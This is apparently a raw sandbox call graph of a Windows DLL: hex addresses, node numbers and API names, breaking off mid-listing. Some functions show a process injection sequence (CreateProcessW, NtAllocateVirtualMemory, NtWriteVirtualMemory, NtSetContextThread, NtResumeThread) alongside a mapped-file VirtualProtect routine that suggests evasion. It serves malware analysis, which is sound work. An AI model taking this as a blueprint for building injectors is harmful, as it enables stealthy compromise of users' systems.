6d7bdf18 13361 6d7bb350 13266->13361 13269 6d7cbb30 40 API calls 13270 6d7bdf77 13269->13270 13271 6d7cbb30 40 API calls 13270->13271 13272 6d7bdf90 13271->13272 13371 6d7bb460 13272->13371 13274 6d7bdfa5 13275 6d7cbb30 40 API calls 13274->13275 13276 6d7be05c 13275->13276 13277 6d7cbb30 40 API calls 13276->13277 13278 6d7be0e4 13277->13278 13279 6d7cbb30 40 API calls 13278->13279 13280 6d7be0fd 13279->13280 13281 6d7cbb30 40 API calls 13280->13281 13282 6d7be113 13281->13282 13382 6d7bcce0 13282->13382 13285 6d7cbb30 40 API calls 13286 6d7be190 13285->13286 13389 6d7bd750 13286->13389 13288 6d7be1b4 13396 6d7b6dc0 13288->13396 13291 6d7cbb30 40 API calls 13292 6d7be264 13291->13292 13293 6d7cbb30 40 API calls 13292->13293 13294 6d7be27d 13293->13294 13400 6d7cbeb0 13294->13400 13296 6d7be2da 13297 6d7cbb30 40 API calls 13296->13297 13298 6d7be300 13297->13298 13299 6d7cbeb0 39 API calls 13298->13299 13300 6d7be348 13299->13300 13301 6d7cbb30 40 API calls 13300->13301 13302 6d7be376 13301->13302 13303 6d7cbb30 40 API calls 13302->13303 13304 6d7be3c1 13303->13304 13305 6d7cbb30 40 API calls 13304->13305 13306 6d7be41e 13305->13306 13307 6d7cbb30 40 API calls 13306->13307 13308 6d7be437 13307->13308 13404 6d7b96e0 13308->13404 13311 6d7cbb30 40 API calls 13312 6d7be493 13311->13312 13313 6d7cbb30 40 API calls 13312->13313 13314 6d7be4ac 13313->13314 13315 6d7cbeb0 39 API calls 13314->13315 13316 6d7be51b 13315->13316 13317 6d7cbb30 40 API calls 13316->13317 13318 6d7be571 13317->13318 13319 6d7cbb30 40 API calls 13318->13319 13320 6d7be587 13319->13320 13321 6d7cbb30 40 API calls 13320->13321 13322 6d7be5f1 13321->13322 13323 6d7cbb30 40 API calls 13322->13323 13339 6d7be608 13323->13339 13324 6d7be768 13325 6d7cbb30 40 API calls 13324->13325 13326 6d7be796 13325->13326 13328 6d7cbb30 40 API calls 13326->13328 13329 6d7be7b0 13328->13329 13331 6d7cbb30 40 API calls 13329->13331 13330 6d7cbb30 40 API calls 13330->13339 13332 6d7be7ca 13331->13332 13333 6d7cbb30 40 API calls 13332->13333 13334 6d7be7e4 13333->13334 13335 6d7cbb30 40 API calls 13334->13335 13336 6d7be7fe 13335->13336 13337 6d7de360 _ValidateLocalCookies 5 API calls 13336->13337 13338 6d7be861 13337->13338 13339->13324 13339->13330 13340 6d7cbeb0 39 API calls 13339->13340 13410 6d7b25d0 13339->13410 13340->13339 13342 6d7cc124 13341->13342 13343 6d7d7380 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13342->13343 13344 6d7cc460 13342->13344 13347 6d7d71e0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13342->13347 13348 6d7d03d0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13342->13348 13343->13342 13345 6d7de360 _ValidateLocalCookies 5 API calls 13344->13345 13346 6d7bde57 13345->13346 13346->13259 13347->13342 13348->13342 13350 6d7cbb51 13349->13350 13417 6d7d03d0 13350->13417 13352 6d7cbcb1 13421 6d7d0550 13352->13421 13355 6d7de360 _ValidateLocalCookies 5 API calls 13356 6d7cbce9 13355->13356 13356->13262 13359 6d7baee7 13357->13359 13358 6d7cbeb0 39 API calls 13358->13359 13359->13358 13360 6d7bb126 13359->13360 13360->13266 13363 6d7bb381 13361->13363 13362 6d7bb41a 13364 6d7cbeb0 39 API calls 13362->13364 13363->13362 13367 6d7cbb30 40 API calls 13363->13367 13365 6d7bb433 13364->13365 13366 6d7cbeb0 39 API calls 13365->13366 13368 6d7bb43c 13366->13368 13367->13363 13369 6d7de360 _ValidateLocalCookies 5 API calls 13368->13369 13370 6d7bb447 13369->13370 13370->13269 13372 6d7bb489 13371->13372 13373 6d7cbb30 40 API calls 13372->13373 13374 6d7bbb3b 13372->13374 13381 6d7cbeb0 39 API calls 13372->13381 13373->13372 13375 6d7cbeb0 39 API calls 13374->13375 13376 6d7bbb43 13375->13376 13377 6d7cbeb0 39 API calls 13376->13377 13378 6d7bbb4b 13377->13378 13379 6d7de360 _ValidateLocalCookies 5 API calls 13378->13379 13380 6d7bbb5e 13379->13380 13380->13274 13381->13372 13388 6d7bcd09 13382->13388 13383 6d7cbb30 40 API calls 13383->13388 13384 6d7bd6b8 13385 6d7de360 _ValidateLocalCookies 5 API calls 13384->13385 13386 6d7bd6cc 13385->13386 13386->13285 13387 6d7cbeb0 39 API calls 13387->13388 13388->13383 13388->13384 13388->13387 13395 6d7bd778 13389->13395 13390 6d7cbb30 40 API calls 13390->13395 13391 6d7bddbd 13392 6d7de360 _ValidateLocalCookies 5 API calls 13391->13392 13393 6d7bddd0 13392->13393 13393->13288 13394 6d7cbeb0 39 API calls 13394->13395 13395->13390 13395->13391 13395->13394 13399 6d7b6e4f 13396->13399 13397 6d7de360 _ValidateLocalCookies 5 API calls 13398 6d7b7130 13397->13398 13398->13291 13399->13397 13403 6d7cbec0 13400->13403 13402 6d7cbf0b 13402->13296 13403->13402 13478 6d7cdcb0 13403->13478 13408 6d7b9739 13404->13408 13405 6d7b9e57 13406 6d7de360 _ValidateLocalCookies 5 API calls 13405->13406 13407 6d7b9e61 13406->13407 13407->13311 13408->13405 13409 6d7cbeb0 39 API calls 13408->13409 13409->13408 13416 6d7b2631 13410->13416 13411 6d7b2a48 13412 6d7de360 _ValidateLocalCookies 5 API calls 13411->13412 13413 6d7b2a5b 13412->13413 13413->13339 13414 6d7cbb30 40 API calls 13414->13416 13415 6d7cbeb0 39 API calls 13415->13416 13416->13411 13416->13414 13416->13415 13418 6d7d03e2 13417->13418 13419 6d7d051c 13418->13419 13420 6d7d1250 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13418->13420 13419->13352 13420->13418 13426 6d7d05a9 13421->13426 13422 6d7d2010 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13422->13426 13423 6d7d22e0 40 API calls 13423->13426 13425 6d7d2510 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13425->13426 13426->13422 13426->13423 13426->13425 13428 6d7d0cc9 13426->13428 13432 6d7d1920 13426->13432 13438 6d7d1a00 13426->13438 13441 6d7d1a40 13426->13441 13429 6d7de360 _ValidateLocalCookies 5 API calls 13428->13429 13430 6d7cbcdf 13429->13430 13430->13355 13433 6d7d193b 13432->13433 13445 6d7d2950 13433->13445 13435 6d7d195f 13436 6d7de360 _ValidateLocalCookies 5 API calls 13435->13436 13437 6d7d19ed 13436->13437 13437->13426 13449 6d7df119 13438->13449 13442 6d7d1a68 13441->13442 13443 6d7de360 _ValidateLocalCookies 5 API calls 13442->13443 13444 6d7d1bc8 13443->13444 13444->13426 13446 6d7d29a6 13445->13446 13447 6d7de360 _ValidateLocalCookies 5 API calls 13446->13447 13448 6d7d2cfe 13447->13448 13448->13435 13454 6d7df0a1 13449->13454 13453 6d7df138 13460 6d7df051 13454->13460 13457 6d7df844 13458 6d7df88b RaiseException 13457->13458 13459 6d7df85e 13457->13459 13458->13453 13459->13458 13463 6d7df8b0 13460->13463 13464 6d7df8bd ___std_exception_copy 13463->13464 13468 6d7df07d 13463->13468 13467 6d7df8ea 13464->13467 13464->13468 13469 6d7e3f36 13464->13469 13466 6d7e3e86 ___std_exception_copy 14 API calls 13466->13468 13467->13466 13468->13457 13470 6d7e3f44 13469->13470 13471 6d7e3f52 13469->13471 13470->13471 13476 6d7e3f6a 13470->13476 13472 6d7e4970 __dosmaperr 14 API calls 13471->13472 13473 6d7e3f5a 13472->13473 13474 6d7e2e99 ___std_exception_copy 39 API calls 13473->13474 13475 6d7e3f64 13474->13475 13475->13467 13476->13475 13477 6d7e4970 __dosmaperr 14 API calls 13476->13477 13477->13473 13479 6d7cdd05 13478->13479 13480 6d7cf040 39 API calls 13479->13480 13483 6d7ce420 13479->13483 13486 6d7ce660 13479->13486 13490 6d7cea10 13479->13490 13480->13479 13484 6d7de360 _ValidateLocalCookies 5 API calls 13483->13484 13485 6d7ce42a 13484->13485 13485->13403 13487 6d7ce6ad 13486->13487 13488 6d7de360 _ValidateLocalCookies 5 API calls 13487->13488 13489 6d7ce9cf 13488->13489 13489->13479 13491 6d7cea5d 13490->13491 13492 6d7de360 _ValidateLocalCookies 5 API calls 13491->13492 13493 6d7cecf8 13492->13493 13493->13479 14389 6d7e38b2 14390 6d7e38c4 14389->14390 14392 6d7e38ca 14389->14392 14393 6d7e3868 14390->14393 14397 6d7e3892 14393->14397 14398 6d7e3875 14393->14398 14394 6d7e388c 14395 6d7e49e0 __freea 14 API calls 14394->14395 14395->14397 14396 6d7e49e0 __freea 14 API calls 14396->14398 14397->14392 14398->14394 14398->14396 13494 6d7d5e30 13496 6d7d5e85 13494->13496 13495 6d7de360 _ValidateLocalCookies 5 API calls 13497 6d7d64f2 13495->13497 13496->13495 14399 6d7ea7b0 14400 6d7ea7d0 14399->14400 14401 6d7eacec __startOneArgErrorHandling 20 API calls 14400->14401 14402 6d7ea7f0 14401->14402 13498 6d7e6431 13499 6d7e6462 13498->13499 13501 6d7e643c 13498->13501 13500 6d7e644c FreeLibrary 13500->13501 13501->13499 13501->13500 12197 6d7dea2e 12198 6d7dea3c 12197->12198 12199 6d7dea37 12197->12199 12203 6d7de8f8 12198->12203 12218 6d7def67 12199->12218 12204 6d7de904 __FrameHandler3::FrameUnwindToState 12203->12204 12205 6d7de92d dllmain_raw 12204->12205 12206 6d7de913 12204->12206 12207 6d7de928 12204->12207 12205->12206 12208 6d7de947 dllmain_crt_dispatch 12205->12208 12222 6d7ca4b0 12207->12222 12208->12206 12208->12207 12211 6d7de999 12211->12206 12212 6d7de9a2 dllmain_crt_dispatch 12211->12212 12212->12206 12214 6d7de9b5 dllmain_raw 12212->12214 12213 6d7ca4b0 __DllMainCRTStartup@12 5 API calls 12215 6d7de980 12213->12215 12214->12206 12226 6d7de848 12215->12226 12217 6d7de98e dllmain_raw 12217->12211 12219 6d7def7d 12218->12219 12221 6d7def86 12219->12221 12562 6d7def1a GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12219->12562 12221->12198 12223 6d7ca50c 12222->12223 12253 6d7de360 12223->12253 12225 6d7caa89 12225->12211 12225->12213 12228 6d7de854 __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 12226->12228 12227 6d7de85d 12227->12217 12228->12227 12229 6d7de885 12228->12229 12230 6d7de8f0 12228->12230 12261 6d7de47d 12229->12261 12282 6d7ded57 IsProcessorFeaturePresent 12230->12282 12233 6d7de88a 12270 6d7defbe 12233->12270 12235 6d7de8f7 __FrameHandler3::FrameUnwindToState 12236 6d7de92d dllmain_raw 12235->12236 12238 6d7de928 12235->12238 12250 6d7de913 12235->12250 12239 6d7de947 dllmain_crt_dispatch 12236->12239 12236->12250 12237 6d7de88f __RTC_Initialize __DllMainCRTStartup@12 12273 6d7de61e 12237->12273 12241 6d7ca4b0 __DllMainCRTStartup@12 5 API calls 12238->12241 12239->12238 12239->12250 12243 6d7de968 12241->12243 12245 6d7de999 12243->12245 12247 6d7ca4b0 __DllMainCRTStartup@12 5 API calls 12243->12247 12246 6d7de9a2 dllmain_crt_dispatch 12245->12246 12245->12250 12248 6d7de9b5 dllmain_raw 12246->12248 12246->12250 12249 6d7de980 12247->12249 12248->12250 12251 6d7de848 __DllMainCRTStartup@12 81 API calls 12249->12251 12250->12217 12252 6d7de98e dllmain_raw 12251->12252 12252->12245 12254 6d7de369 IsProcessorFeaturePresent 12253->12254 12255 6d7de368 12253->12255 12257 6d7dea8e 12254->12257 12255->12225 12260 6d7dea51 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12257->12260 12259 6d7deb71 12259->12225 12260->12259 12262 6d7de482 ___scrt_release_startup_lock 12261->12262 12263 6d7de486 12262->12263 12267 6d7de492 __DllMainCRTStartup@12 12262->12267 12286 6d7e3bea 12263->12286 12265 6d7de490 12265->12233 12266 6d7de49f 12266->12233 12267->12266 12290 6d7e3241 12267->12290 12427 6d7e1396 InterlockedFlushSList 12270->12427 12274 6d7de62a 12273->12274 12276 6d7de640 12274->12276 12434 6d7e3da7 12274->12434 12279 6d7de8ea 12276->12279 12277 6d7de638 12439 6d7e0fe2 12277->12439 12545 6d7de4a0 12279->12545 12283 6d7ded6d __FrameHandler3::FrameUnwindToState std::bad_exception::bad_exception 12282->12283 12284 6d7dee18 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12283->12284 12285 6d7dee5c __FrameHandler3::FrameUnwindToState 12284->12285 12285->12235 12287 6d7e3bf6 __EH_prolog3 12286->12287 12301 6d7e3923 12287->12301 12289 6d7e3c1d __DllMainCRTStartup@12 12289->12265 12291 6d7e326e 12290->12291 12299 6d7e327f 12290->12299 12372 6d7e3309 GetModuleHandleW 12291->12372 12296 6d7e32bd 12296->12233 12379 6d7e30f1 12299->12379 12302 6d7e392f __FrameHandler3::FrameUnwindToState 12301->12302 12309 6d7e4828 EnterCriticalSection 12302->12309 12304 6d7e393d 12310 6d7e3afa 12304->12310 12309->12304 12311 6d7e3b19 12310->12311 12312 6d7e394a 12310->12312 12311->12312 12317 6d7e49e0 12311->12317 12314 6d7e3972 12312->12314 12371 6d7e4870 LeaveCriticalSection 12314->12371 12316 6d7e395b 12316->12289 12318 6d7e49eb HeapFree 12317->12318 12322 6d7e4a15 12317->12322 12319 6d7e4a00 GetLastError 12318->12319 12318->12322 12320 6d7e4a0d __dosmaperr 12319->12320 12323 6d7e4970 12320->12323 12322->12312 12326 6d7e45ad GetLastError 12323->12326 12325 6d7e4975 12325->12322 12327 6d7e45c9 12326->12327 12328 6d7e45c3 12326->12328 12332 6d7e45cd SetLastError 12327->12332 12354 6d7e6302 12327->12354 12349 6d7e62c3 12328->12349 12332->12325 12336 6d7e4602 12339 6d7e6302 _unexpected 6 API calls 12336->12339 12337 6d7e4613 12338 6d7e6302 _unexpected 6 API calls 12337->12338 12340 6d7e461f 12338->12340 12341 6d7e4610 12339->12341 12342 6d7e463a 12340->12342 12343 6d7e4623 12340->12343 12345 6d7e49e0 __freea 12 API calls 12341->12345 12366 6d7e425e 12342->12366 12344 6d7e6302 _unexpected 6 API calls 12343->12344 12344->12341 12345->12332 12348 6d7e49e0 __freea 12 API calls 12348->12332 12350 6d7e6161 _unexpected 5 API calls 12349->12350 12351 6d7e62df 12350->12351 12352 6d7e62fa TlsGetValue 12351->12352 12353 6d7e62e8 12351->12353 12353->12327 12355 6d7e6161 _unexpected 5 API calls 12354->12355 12356 6d7e631e 12355->12356 12357 6d7e633c TlsSetValue 12356->12357 12358 6d7e45e5 12356->12358 12358->12332 12359 6d7e4983 12358->12359 12364 6d7e4990 _unexpected 12359->12364 12360 6d7e49d0 12363 6d7e4970 __dosmaperr 13 API calls 12360->12363 12361 6d7e49bb HeapAlloc 12362 6d7e45fa 12361->12362 12361->12364 12362->12336 12362->12337 12363->12362 12364->12360 12364->12361 12365 6d7e3df8 _unexpected EnterCriticalSection LeaveCriticalSection 12364->12365 12365->12364 12367 6d7e40f2 _unexpected EnterCriticalSection LeaveCriticalSection 12366->12367 12368 6d7e42cc 12367->12368 12369 6d7e4204 _unexpected 14 API calls 12368->12369 12370 6d7e42f5 12369->12370 12370->12348 12371->12316 12373 6d7e3273 12372->12373 12373->12299 12374 6d7e3364 GetModuleHandleExW 12373->12374 12375 6d7e33b7 12374->12375 12376 6d7e33a3 GetProcAddress 12374->12376 12377 6d7e33ca FreeLibrary 12375->12377 12378 6d7e33d3 12375->12378 12376->12375 12377->12378 12378->12299 12380 6d7e30fd __FrameHandler3::FrameUnwindToState 12379->12380 12394 6d7e4828 EnterCriticalSection 12380->12394 12382 6d7e3107 12395 6d7e3159 12382->12395 12384 6d7e3114 12399 6d7e3132 12384->12399 12387 6d7e32d8 12403 6d7e334b 12387->12403 12389 6d7e32e2 12390 6d7e32f6 12389->12390 12391 6d7e32e6 GetCurrentProcess TerminateProcess 12389->12391 12392 6d7e3364 __FrameHandler3::FrameUnwindToState 3 API calls 12390->12392 12391->12390 12393 6d7e32fe ExitProcess 12392->12393 12394->12382 12396 6d7e3165 __FrameHandler3::FrameUnwindToState 12395->12396 12397 6d7e3bea __DllMainCRTStartup@12 14 API calls 12396->12397 12398 6d7e31c9 __FrameHandler3::FrameUnwindToState 12396->12398 12397->12398 12398->12384 12402 6d7e4870 LeaveCriticalSection 12399->12402 12401 6d7e3120 12401->12296 12401->12387 12402->12401 12406 6d7e48ac 12403->12406 12405 6d7e3350 __FrameHandler3::FrameUnwindToState 12405->12389 12407 6d7e48bb __FrameHandler3::FrameUnwindToState 12406->12407 12408 6d7e48c8 12407->12408 12410 6d7e61e6 12407->12410 12408->12405 12413 6d7e6161 12410->12413 12412 6d7e6202 12412->12408 12414 6d7e6191 12413->12414 12418 6d7e618d _unexpected 12413->12418 12414->12418 12419 6d7e6096 12414->12419 12417 6d7e61ab GetProcAddress 12417->12418 12418->12412 12425 6d7e60a7 ___vcrt_InitializeCriticalSectionEx 12419->12425 12420 6d7e613d 12420->12417 12420->12418 12421 6d7e60c5 LoadLibraryExW 12422 6d7e6144 12421->12422 12423 6d7e60e0 GetLastError 12421->12423 12422->12420 12424 6d7e6156 FreeLibrary 12422->12424 12423->12425 12424->12420 12425->12420 12425->12421 12426 6d7e6113 LoadLibraryExW 12425->12426 12426->12422 12426->12425 12428 6d7e13a6 12427->12428 12429 6d7defc8 12427->12429 12428->12429 12431 6d7e3e86 12428->12431 12429->12237 12432 6d7e49e0 __freea 14 API calls 12431->12432 12433 6d7e3e9e 12432->12433 12433->12428 12435 6d7e3dc4 ___scrt_uninitialize_crt 12434->12435 12436 6d7e3db2 12434->12436 12435->12277 12437 6d7e3dc0 12436->12437 12445 6d7e6d1f 12436->12445 12437->12277 12440 6d7e0feb 12439->12440 12441 6d7e0ff5 12439->12441 12520 6d7e14d3 12440->12520 12441->12276 12448 6d7e6bb0 12445->12448 12451 6d7e6b04 12448->12451 12452 6d7e6b10 __FrameHandler3::FrameUnwindToState 12451->12452 12459 6d7e4828 EnterCriticalSection 12452->12459 12454 6d7e6b86 12468 6d7e6ba4 12454->12468 12457 6d7e6b1a ___scrt_uninitialize_crt 12457->12454 12460 6d7e6a78 12457->12460 12459->12457 12461 6d7e6a84 __FrameHandler3::FrameUnwindToState 12460->12461 12471 6d7e6e3c EnterCriticalSection 12461->12471 12463 6d7e6a8e ___scrt_uninitialize_crt 12467 6d7e6ac7 12463->12467 12472 6d7e6cba 12463->12472 12485 6d7e6af8 12467->12485 12519 6d7e4870 LeaveCriticalSection 12468->12519 12470 6d7e6b92 12470->12437 12471->12463 12473 6d7e6ccf ___std_exception_copy 12472->12473 12474 6d7e6cd6 12473->12474 12475 6d7e6ce1 12473->12475 12477 6d7e6bb0 ___scrt_uninitialize_crt 68 API calls 12474->12477 12488 6d7e6c51 12475->12488 12484 6d7e6cdc 12477->12484 12482 6d7e6d02 12501 6d7e8524 12482->12501 12512 6d7e2bd5 12484->12512 12518 6d7e6e50 LeaveCriticalSection 12485->12518 12487 6d7e6ae6 12487->12457 12489 6d7e6c6a 12488->12489 12493 6d7e6c91 12488->12493 12490 6d7e70a1 ___scrt_uninitialize_crt 39 API calls 12489->12490 12489->12493 12491 6d7e6c86 12490->12491 12492 6d7e8d43 ___scrt_uninitialize_crt 64 API calls 12491->12492 12492->12493 12493->12484 12494 6d7e70a1 12493->12494 12495 6d7e70ad 12494->12495 12496 6d7e70c2 12494->12496 12497 6d7e4970 __dosmaperr 14 API calls 12495->12497 12496->12482 12498 6d7e70b2 12497->12498 12499 6d7e2e99 ___std_exception_copy 39 API calls 12498->12499 12500 6d7e70bd 12499->12500 12500->12482 12502 6d7e8535 12501->12502 12503 6d7e8542 12501->12503 12504 6d7e4970 __dosmaperr 14 API calls 12502->12504 12505 6d7e858b 12503->12505 12509 6d7e8569 12503->12509 12508 6d7e853a 12504->12508 12506 6d7e4970 __dosmaperr 14 API calls 12505->12506 12507 6d7e8590 12506->12507 12511 6d7e2e99 ___std_exception_copy 39 API calls 12507->12511 12508->12484 12510 6d7e8482 ___scrt_uninitialize_crt 43 API calls 12509->12510 12510->12508 12511->12508 12513 6d7e2be1 12512->12513 12514 6d7e2c80 ___std_exception_copy 39 API calls 12513->12514 12515 6d7e2bf8 12513->12515 12514->12515 12516 6d7e2c80 ___std_exception_copy 39 API calls 12515->12516 12517 6d7e2c0b 12515->12517 12516->12517 12517->12467 12518->12487 12519->12470 12521 6d7e14dd 12520->12521 12522 6d7e0ff0 12520->12522 12528 6d7e181d 12521->12528 12524 6d7e152a 12522->12524 12525 6d7e1554 12524->12525 12526 6d7e1535 12524->12526 12525->12441 12527 6d7e153f DeleteCriticalSection 12526->12527 12527->12525 12527->12527 12533 6d7e16f7 12528->12533 12531 6d7e184f TlsFree 12532 6d7e1843 12531->12532 12532->12522 12534 6d7e1714 12533->12534 12537 6d7e1718 12533->12537 12534->12531 12534->12532 12535 6d7e1780 GetProcAddress 12535->12534 12537->12534 12537->12535 12538 6d7e1771 12537->12538 12540 6d7e1797 LoadLibraryExW 12537->12540 12538->12535 12539 6d7e1779 FreeLibrary 12538->12539 12539->12535 12541 6d7e17ae GetLastError 12540->12541 12542 6d7e17de 12540->12542 12541->12542 12543 6d7e17b9 ___vcrt_InitializeCriticalSectionEx 12541->12543 12542->12537 12543->12542 12544 6d7e17cf LoadLibraryExW 12543->12544 12544->12537 12550 6d7e3dd7 12545->12550 12548 6d7e14d3 ___vcrt_uninitialize_ptd 6 API calls 12549 6d7de8ef 12548->12549 12549->12227 12553 6d7e472d 12550->12553 12554 6d7e4737 12553->12554 12555 6d7de4a7 12553->12555 12557 6d7e6284 12554->12557 12555->12548 12558 6d7e6161 _unexpected 5 API calls 12557->12558 12559 6d7e62a0 12558->12559 12560 6d7e62bb TlsFree 12559->12560 12561 6d7e62a9 12559->12561 12561->12555 12562->12221 12931 6d7c45a0 12938 6d7c45c0 std::bad_exception::bad_exception 12931->12938 12932 6d7c9d06 CloseHandle 12932->12938 12933 6d7ca284 CreateProcessW 12933->12938 12934 6d7ca343 NtAllocateVirtualMemory 12934->12938 12935 6d7c8992 GetConsoleWindow ShowWindow 12958 6d7bea30 12935->12958 12937 6d7bea30 21 API calls 12937->12938 12938->12932 12938->12933 12938->12934 12938->12935 12938->12937 12940 6d7c9f52 12938->12940 12943 6d7c8db4 CreateProcessW 12938->12943 12944 6d7c995e NtWriteVirtualMemory 12938->12944 12945 6d7c8aa1 VirtualAlloc 12938->12945 12946 6d7c9d7b CloseHandle 12938->12946 12947 6d7c9783 NtWriteVirtualMemory 12938->12947 12948 6d7c9217 NtAllocateVirtualMemory 12938->12948 12949 6d7ca38e NtWriteVirtualMemory 12938->12949 12950 6d7c0a10 7 API calls 12938->12950 12951 6d7ca472 CloseHandle 12938->12951 12952 6d7c9b32 NtSetContextThread NtResumeThread 12938->12952 12953 6d7c9a9b NtCreateThreadEx 12938->12953 12954 6d7c92ee NtAllocateVirtualMemory 12938->12954 12955 6d7c9078 NtGetContextThread 12938->12955 12956 6d7ca3fd NtWriteVirtualMemory 12938->12956 12957 6d7c93ac NtWriteVirtualMemory 12938->12957 12976 6d7be870 12938->12976 12941 6d7de360 _ValidateLocalCookies 5 API calls 12940->12941 12942 6d7c9f5c 12941->12942 12943->12938 12944->12938 12945->12938 12946->12938 12947->12938 12948->12938 12949->12938 12950->12938 12951->12938 12952->12938 12953->12938 12954->12938 12955->12938 12956->12938 12957->12938 12967 6d7bea97 CatchIt std::bad_exception::bad_exception 12958->12967 12959 6d7bfd34 CloseHandle CloseHandle 12959->12967 12960 6d7bfa75 VirtualProtect 12960->12967 12961 6d7bf4df CreateFileMappingA 12961->12967 12962 6d7bf0cb GetCurrentProcess 12962->12967 12963 6d7bf2b8 K32GetModuleInformation 12963->12967 12964 6d7bf42f GetModuleFileNameA CreateFileA 12964->12967 12965 6d7bf563 CloseHandle 12965->12967 12966 6d7bfb0c VirtualProtect 12966->12967 12967->12959 12967->12960 12967->12961 12967->12962 12967->12963 12967->12964 12967->12965 12967->12966 12968 6d7bfddd 12967->12968 12970 6d7bfeca CloseHandle CloseHandle 12967->12970 12972 6d7bfdbf CloseHandle 12967->12972 12973 6d7bfe0c K32GetModuleInformation 12967->12973 12974 6d7bf168 GetModuleHandleA 12967->12974 12975 6d7bf67c MapViewOfFile 12967->12975 12969 6d7de360 _ValidateLocalCookies 5 API calls 12968->12969 12971 6d7bfde7 12969->12971 12970->12967 12971->12938 12972->12967 12973->12967 12974->12967 12975->12967 12977 6d7be8c6 12976->12977 12978 6d7de360 _ValidateLocalCookies 5 API calls 12977->12978 12979 6d7bea16 12978->12979 12979->12938 13502 6d7c1420 13503 6d7c1467 13502->13503 13504 6d7cc590 39 API calls 13503->13504 13505 6d7c15a3 13503->13505 13504->13503 13506 6d7e9f20 13509 6d7e9f3e 13506->13509 13508 6d7e9f36 13510 6d7e9f43 13509->13510 13513 6d7e9fd8 13510->13513 13514 6d7ea803 13510->13514 13513->13508 13515 6d7ea816 DecodePointer 13514->13515 13516 6d7ea826 13514->13516 13515->13516 13517 6d7ea86a 13516->13517 13518 6d7ea16f 13516->13518 13519 6d7ea855 13516->13519 13517->13518 13520 6d7e4970 __dosmaperr 14 API calls 13517->13520 13518->13508 13519->13518 13521 6d7e4970 __dosmaperr 14 API calls 13519->13521 13520->13518 13521->13518 13522 6d7e3421 13523 6d7e3438 13522->13523 13533 6d7e3431 13522->13533 13524 6d7e3459 13523->13524 13526 6d7e3443 13523->13526 13552 6d7e59e4 13524->13552 13528 6d7e4970 __dosmaperr 14 API calls 13526->13528 13530 6d7e3448 13528->13530 13532 6d7e2e99 ___std_exception_copy 39 API calls 13530->13532 13532->13533 13538 6d7e34bb 13541 6d7e4970 __dosmaperr 14 API calls 13538->13541 13539 6d7e34c7 13540 6d7e355e 39 API calls 13539->13540 13542 6d7e34dd 13540->13542 13543 6d7e34c0 13541->13543 13542->13543 13544 6d7e3501 13542->13544 13545 6d7e49e0 __freea 14 API calls 13543->13545 13546 6d7e3518 13544->13546 13547 6d7e3522 13544->13547 13545->13533 13548 6d7e49e0 __freea 14 API calls 13546->13548 13549 6d7e49e0 __freea 14 API calls 13547->13549 13550 6d7e3520 13548->13550 13549->13550 13551 6d7e49e0 __freea 14 API calls 13550->13551 13551->13533 13553 6d7e59ed 13552->13553 13554 6d7e345f 13552->13554 13580 6d7e4517 13553->13580 13558 6d7e53c7 GetModuleFileNameW 13554->13558 13559 6d7e53f6 GetLastError 13558->13559 13560 6d7e5407 13558->13560 13822 6d7e4916 13559->13822 13827 6d7e5145 13560->13827 13564 6d7e5402 13566 6d7de360 _ValidateLocalCookies 5 API calls 13564->13566 13567 6d7e3472 13566->13567 13568 6d7e355e 13567->13568 13570 6d7e3584 13568->13570 13572 6d7e35e2 13570->13572 13869 6d7e5d15 13570->13869 13571 6d7e34a5 13574 6d7e36d2 13571->13574 13572->13571 13573 6d7e5d15 39 API calls 13572->13573 13573->13572 13575 6d7e36e3 13574->13575 13576 6d7e34b2 13574->13576 13575->13576 13577 6d7e4983 _unexpected 14 API calls 13575->13577 13576->13538 13576->13539 13578 6d7e370c 13577->13578 13579 6d7e49e0 __freea 14 API calls 13578->13579 13579->13576 13581 6d7e4528 13580->13581 13582 6d7e4522 13580->13582 13584 6d7e6302 _unexpected 6 API calls 13581->13584 13603 6d7e452e 13581->13603 13583 6d7e62c3 _unexpected 6 API calls 13582->13583 13583->13581 13585 6d7e4542 13584->13585 13586 6d7e4983 _unexpected 14 API calls 13585->13586 13585->13603 13589 6d7e4552 13586->13589 13587 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 13590 6d7e45ac 13587->13590 13588 6d7e4533 13605 6d7e57ef 13588->13605 13591 6d7e456f 13589->13591 13592 6d7e455a 13589->13592 13594 6d7e6302 _unexpected 6 API calls 13591->13594 13593 6d7e6302 _unexpected 6 API calls 13592->13593 13595 6d7e4566 13593->13595 13596 6d7e457b 13594->13596 13600 6d7e49e0 __freea 14 API calls 13595->13600 13597 6d7e458e 13596->13597 13598 6d7e457f 13596->13598 13599 6d7e425e _unexpected 14 API calls 13597->13599 13601 6d7e6302 _unexpected 6 API calls 13598->13601 13602 6d7e4599 13599->13602 13600->13603 13601->13595 13604 6d7e49e0 __freea 14 API calls 13602->13604 13603->13587 13603->13588 13604->13588 13628 6d7e5944 13605->13628 13610 6d7e5832 13610->13554 13611 6d7e6e64 15 API calls 13612 6d7e5843 13611->13612 13613 6d7e584b 13612->13613 13614 6d7e5859 13612->13614 13615 6d7e49e0 __freea 14 API calls 13613->13615 13646 6d7e5a3f 13614->13646 13615->13610 13618 6d7e5891 13619 6d7e4970 __dosmaperr 14 API calls 13618->13619 13621 6d7e5896 13619->13621 13620 6d7e58d8 13623 6d7e5921 13620->13623 13657 6d7e5468 13620->13657 13624 6d7e49e0 __freea 14 API calls 13621->13624 13622 6d7e58ac 13622->13620 13625 6d7e49e0 __freea 14 API calls 13622->13625 13627 6d7e49e0 __freea 14 API calls 13623->13627 13624->13610 13625->13620 13627->13610 13629 6d7e5950 __FrameHandler3::FrameUnwindToState 13628->13629 13630 6d7e596a 13629->13630 13665 6d7e4828 EnterCriticalSection 13629->13665 13632 6d7e5819 